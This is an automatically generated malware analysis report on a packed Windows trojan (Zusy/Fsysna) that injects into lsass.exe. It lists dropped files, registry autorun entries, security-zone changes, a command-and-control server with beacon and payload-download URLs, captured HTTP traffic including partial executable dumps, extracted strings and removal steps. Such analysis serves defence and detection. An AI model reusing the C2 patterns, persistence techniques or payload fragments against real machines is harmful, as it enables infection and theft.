Gen.Variant.Zusy.118945_d358217856
Gen:Variant.Zusy.118945 (BitDefender), Trojan.Win32.Fsysna.bakv (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Gen:Variant.Zusy.118945 (B) (Emsisoft), RDN/Generic PWS.y!bcd (McAfee), Trojan.Gen.2 (Symantec), Trojan.Win32.Fsysna (Ikarus), Gen:Variant.Zusy.118945 (FSecure), PSW.Generic12.BCNL (AVG), Win32:Malware-gen (Avast), PAK_Generic.005 (TrendMicro), Gen:Variant.Zusy.118945 (AdAware), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: d358217856c7b4c3af399b483494d9c0
SHA1: f8eeaf79d8880959c76119aec557f1b4d13bf089
SHA256: 2d0448105fe3301d5a33052eab3947ca95ee4a5d7b70a879329cad9294180c31
SSDeep: 384:x734EKHg9Uu031KnthHhp3LSmqREBU6Q2BpjhZEdBEd7D:x78gV03ehBp7qLj2rjpd7
Size: 23552 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2014-12-07 21:53:23
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:468
lsass.exe:1232
Mutexes
The following mutexes were created/opened:
ShimCacheMutex
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
krikoc
File activity
The process %original file name%.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bitck1\Text.txt (34 bytes)
%Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx\lsass.exe (1643 bytes)
%Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx\smss.exe (2559 bytes)
%Documents and Settings%\%current user%\Application Data\System\Oracle\smss.exe (23 bytes)
Registry activity
The process %original file name%.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 A4 98 A8 3C 14 FF 2B 02 C7 31 24 6B AA B8 FB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx]
"smss.exe" = "smss"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx]
"lsass.exe" = "lsass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows" = "%Documents and Settings%\%current user%\Application Data\System\Oracle\smss.exe"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any other zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows" = "%WinDir%\explorer\smss.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 98ae3cce49223d0ee4e495fa06b3b350 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\System\Oracle\azioklmpx\lsass.exe |
| 3e5385448f133c1794680606e0efa319 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\System\Oracle\azioklmpx\smss.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 53248 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 57344 | 24576 | 22016 | 5.46593 | 011a94c023afb84216060f7c4ab8b476 |
| UPX2 | 81920 | 4096 | 1024 | 1.93267 | 01b93834e141605c003c23902528136f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://87.121.52.65/panel/includes/verif.php | |
| hxxp://87.121.52.65/panel/includes/persis.php | |
| hxxp://87.121.52.65/panel/includes/kit47896.exe | |
| hxxp://87.121.52.65/panel/includes/btcplugin.php | |
| hxxp://87.121.52.65/panel/includes/btcplugin.exe | |
| hxxp://87.121.52.65/panel/includes/d_elay.php | |
| hxxp://87.121.52.65/panel/includes/day.php | |
| hxxp://87.121.52.65/panel/includes/ip.php | |
| hxxp://87.121.52.65/panel/includes/country.php?IP=37.57.16.189 | |
| hxxp://87.121.52.65/panel/includes/idcontact.php?COMPUTER=XP8&steam=0&origin=0&webnavig=0&java=1&memoireRAMbytes=536330240&diskhard=8578932736&avname=0&parefire=0&install=20150109&gpu=0&cpu=Intel(R)Core(TM)[email protected] | |
| hxxp://87.121.52.65/panel/includes/bkill.php | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
GET hXXp://87.121.52.65/panel/includes/btcplugin.php HTTP/1.
HTTP/1.1 200 OK
Date: Fri, 09 Jan 2015 11:31:31 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.35-0 deb7u2
Set-Cookie: PHPSESSID=lqi4e95lrqstopcclai470ofu0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 34
Connection: close
Content-Type: text/html

1A1NepMBi53mVcwxAZrRe27o74TG1NyVzH..
GET /panel/includes/idcontact.php?COMPUTER=XP8&steam=0&origin=0&webnavig=0&java=1&memoireRAMbytes=536330240&diskhard=8578932736&avname=0&parefire=0&install=20150109&gpu=0&cpu=Intel(R)Core(TM)[email protected] HTTP/1.0
Host: 87.121.52.65
User-Agent: crackim
Connection: Close
HTTP/1.1 200 OK
Date: Fri, 09 Jan 2015 11:31:33 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.35-0 deb7u2
Set-Cookie: PHPSESSID=geop1e975ufokv1uu1ljfnue52; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14
Connection: close
Content-Type: text/html

Statistics Ok!..
GET hXXp://87.121.52.65/panel/includes/d_elay.php HTTP/1.
HTTP/1.1 200 OK
Date: Fri, 09 Jan 2015 11:31:32 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.35-0 deb7u2
Set-Cookie: PHPSESSID=81hog5asr691h2fa36861u0mu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5
Connection: close
Content-Type: text/html

60000..
GET /panel/includes/kit47896.exe HTTP/1.0
Host: 87.121.52.65
User-Agent: crackim
Connection: Close
HTTP/1.1 200 OK
Date: Fri, 09 Jan 2015 11:31:30 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sat, 27 Dec 2014 18:26:55 GMT
ETag: "2600ddc-2200-50b36c9369c2c"
Accept-Ranges: bytes
Content-Length: 8704
Connection: close
Content-Type: application/x-msdos-program

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...y..T
...............2. .......`.......p........@...........................
......................................................................
......................................................................
..........................UPX0.....`..............................UPX1
..... [email protected].............................
[email protected]!.....8.W.....d.......6..&.......h..h...W@............._
..... .*;v...../.#.....?l.....".n..$X.5...!..$-,.S1.P......T$......h.6
.(.P...?.D$..|........X..n.FRR.t$k.'.....SR,..:.m*.4.....|P{.v.' .'<
;5..6`..$.....Z..-..-..Q..$......./...!.t......h.....`sV'..........n..
4.......y.W[..S.......$*JI...u..9,.[.(..~..\{.,.C.\.)...].g...P-.L$...
.e......@....@6.< ........R.t..s.v......Wp...;...4l.........!..6...
::$.. |.1wi ]".q.7...7{lz............X..t....#....f.^O."..{...." J.D$O
rH ..P@3X....=..mp....:.!..^!...s....l.....:..._6.v..h O...\.%.V0t2. .
.8..KSn..k...0.J!..'n..F||)2...KA......tV\!c...Y...u8.#<.....$..G..
B.8.Iu..6l..qJR .;a 9...1..9s.T.(...).lIn.>...X....@ .^....Pr......
..... V}.lt .w....h..P.U'y..;.$u..F...:.....'y..".(..2...y..<...\.
.{W..2|...(4..!.<x.....w...........`Y..h...t .e..u.h.P.....Y`......
..]k#.Mu...<G..8...*8*..X.."...Ub.vO..#h.l..vy.@.<.l|{.......{h.
.........`...6@t.'.~.%....f}..$.-.....y`.....O...FA.[....<=......o.
...{X..._........h.S..PQ...82..".... .....B2......F.!. c.z. <..<<< skipped >>>
GET hXXp://87.121.52.65/panel/includes/day.php HTTP/1.
HTTP/1.1 200 OK
Date: Fri, 09 Jan 2015 11:31:33 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.35-0 deb7u2
Vary: Accept-Encoding
Content-Length: 8
Connection: close
Content-Type: text/html

20150109..
GET hXXp://87.121.52.65/panel/includes/verif.php HTTP/1.
HTTP/1.1 200 OK
Date: Fri, 09 Jan 2015 11:31:30 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.35-0 deb7u2
Vary: Accept-Encoding
Content-Length: 1
Connection: close
Content-Type: text/html

1..
GET /panel/includes/btcplugin.exe HTTP/1.0
Host: 87.121.52.65
User-Agent: crackim
Connection: Close
HTTP/1.1 200 OK
Date: Fri, 09 Jan 2015 11:31:32 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sat, 27 Dec 2014 18:26:19 GMT
ETag: "2600dac-1a00-50b36c718fab6"
Accept-Ranges: bytes
Content-Length: 6656
Connection: close
Content-Type: application/x-msdos-program

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......T
...............2. .......`.. ....p........@...........................
..................................................@...................
......................................................................
..........................UPX0.....`..............................UPX1
..... [email protected].............................
[email protected]!......V'j....c.......,..&.......h .h...T@..............
.... .....*.../L!......w..[.5.-hP@#..h.............".....F*......_....
&...T$.E.L..!.t....0}....!.u.(.RR.......h.q6......G.g.o.....h.'..9{...
........ d...,..........:...|2..:.. h2^2..............h>..J...6&..d
(*B".J.:.,..m....u....<.!....d.l.....|.$G..S1.P..D$ ...o.4.......h"
qt...1..l."...$O....uR...P.7..\...l....s......:......_...O.....T..t2 .
. ..KS}...an.k...1H.F.r.,..)2/M...l....h..t..c.V\.Y._.u8M....B...$....
>....!..0......&.T7".qJ..2`R 9\.=K."..T.y.I/I..o....<..l....u...
u...^.....J.^F.-..(X..2.....na.f...4.. ;......l.y..[....._.QRQ.Y...l..
4..%.Q...............V]..Y..P....I.nS.......f..u. ....3........Q.|..V.
.u...o..^Y.?.SU.-.RM .W.......VN...<0..P......k.W..... .u.\...V...L
$.u._][C..n......N^3(<.o[s;Q.,1....8m...gGPM....F..........\^..|...
.I......HtR;f;.....u.%...tN....<?.../.. .u. .....t.....,.g._....^].
[[email protected]>t@.:t;.98u. ........}.
...;.~.H..DN...f.....S...(_@^[.{...j.Ok....BpB:V&.y50.err%.7...0&l<<< skipped >>>
GET hXXp://87.121.52.65/panel/includes/persis.php HTTP/1.
HTTP/1.1 200 OK
Date: Fri, 09 Jan 2015 11:31:30 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.35-0 deb7u2
Set-Cookie: PHPSESSID=e7ddgh5moigcspfvn87ceotcb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1
Connection: close
Content-Type: text/html

1..
GET hXXp://87.121.52.65/panel/includes/ip.php HTTP/1.
HTTP/1.1 200 OK
Date: Fri, 09 Jan 2015 11:31:33 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.35-0 deb7u2
Vary: Accept-Encoding
Content-Length: 12
Connection: close
Content-Type: text/html

37.57.16.189..
GET hXXp://87.121.52.65/panel/includes/bkill.php HTTP/1.
HTTP/1.1 200 OK
Date: Fri, 09 Jan 2015 11:31:34 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.35-0 deb7u2
Set-Cookie: PHPSESSID=pondu5mvbqjvf3ioha070j87b4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1
Connection: close
Content-Type: text/html

1..
GET hXXp://87.121.52.65/panel/includes/country.php?IP=37.57.16.189 HTTP/1.
HTTP/1.1 200 OK
Date: Fri, 09 Jan 2015 11:31:33 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.35-0 deb7u2
Vary: Accept-Encoding
Content-Length: 7
Connection: close
Content-Type: text/html

Ukraine..
The Trojan connects to the servers at the following location(s):
ws2_32.dll
?456789:;<=
!"#$%&'()* ,-./0123
CreatePipe
RegCreateKeyW
RegOpenKeyW
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
ShellExecuteW
ShellExecuteExW
EnumWindows
.code
`.text
`.rdata
@.data
4%_i%c
.tl3fl
KERNEL32.DLL
ADVAPI32.DLL
COMCTL32.DLL
MSVCRT.dll
OLE32.DLL
SHELL32.DLL
USER32.DLL
WINMM.DLL
WSOCK32.DLL
2147483648
%%.ß
post.php
persis.php
btcplugin.php
ip.php
ntdll.dll
D:\NVIDIA\
kit47896.exe
\Opera\
(x86)\Opera\
country.php?IP=
verif.php
D:\AMD\
install_info.php
Kernel32.dll
kernel32.dll
Windows
\Chrome\
smss.exe
HTTP/1.0
gettask.php?RUN=
\bitck1\Text.txt
Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
rpcss.exe
DlExe
\System\Oracle\smss.exe
psapi.dll
d_elay.php
\explorer\smss.exe
pinginfo.php
%Program Files%\McAfee\
(x86)\Firefox\
\System\Oracle\azioklmpx\lsass.exe
\System\Oracle\azioklmpx\smss.exe
btcplugin.exe
explorer.exe
day.php
&webnavig=
idcontact.php?COMPUTER=
get.php?IP=
\Firefox\
(x86)\Chrome\
C:\AMD\
C:\NVIDIA\
bkill.php
Software\Microsoft\Windows\CurrentVersion\Run
hXXp://
{118c04c0-7454-11e2-81a8-806d6172696f}
%original file name%.exe_468_rwx_00401000_00012000:
ws2_32.dll
?456789:;<=
!"#$%&'()* ,-./0123
CreatePipe
RegCreateKeyW
RegOpenKeyW
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
ShellExecuteW
ShellExecuteExW
EnumWindows
.code
`.text
`.rdata
@.data
4%_i%c
2147483648
%%.ß
post.php
persis.php
btcplugin.php
ip.php
ntdll.dll
D:\NVIDIA\
kit47896.exe
\Opera\
(x86)\Opera\
country.php?IP=
verif.php
D:\AMD\
install_info.php
Kernel32.dll
kernel32.dll
Windows
\Chrome\
smss.exe
HTTP/1.0
gettask.php?RUN=
\bitck1\Text.txt
Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
rpcss.exe
DlExe
\System\Oracle\smss.exe
psapi.dll
d_elay.php
\explorer\smss.exe
pinginfo.php
%Program Files%\McAfee\
(x86)\Firefox\
\System\Oracle\azioklmpx\lsass.exe
\System\Oracle\azioklmpx\smss.exe
btcplugin.exe
explorer.exe
day.php
&webnavig=
idcontact.php?COMPUTER=
get.php?IP=
\Firefox\
(x86)\Chrome\
C:\AMD\
C:\NVIDIA\
bkill.php
Software\Microsoft\Windows\CurrentVersion\Run
hXXp://
{118c04c0-7454-11e2-81a8-806d6172696f}
lsass.exe_1232:
`.rsrc
.code
`.text
`.rdata
@.data
.rsrc
version="1.0.0.0"
name="CompanyName.ProductName.YourApp"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
KERNEL32.DLL
MSVCRT.dll
USER32.DLL
WINMM.DLL
\bitck1\Text.txt
lsass.exe_1232_rwx_00401000_00007000:
.code
`.text
`.rdata
@.data
.rsrc
\bitck1\Text.txt
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\bitck1\Text.txt (34 bytes)
%Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx\lsass.exe (1643 bytes)
%Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx\smss.exe (2559 bytes)
%Documents and Settings%\%current user%\Application Data\System\Oracle\smss.exe (23 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows" = "%Documents and Settings%\%current user%\Application Data\System\Oracle\smss.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows" = "%WinDir%\explorer\smss.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.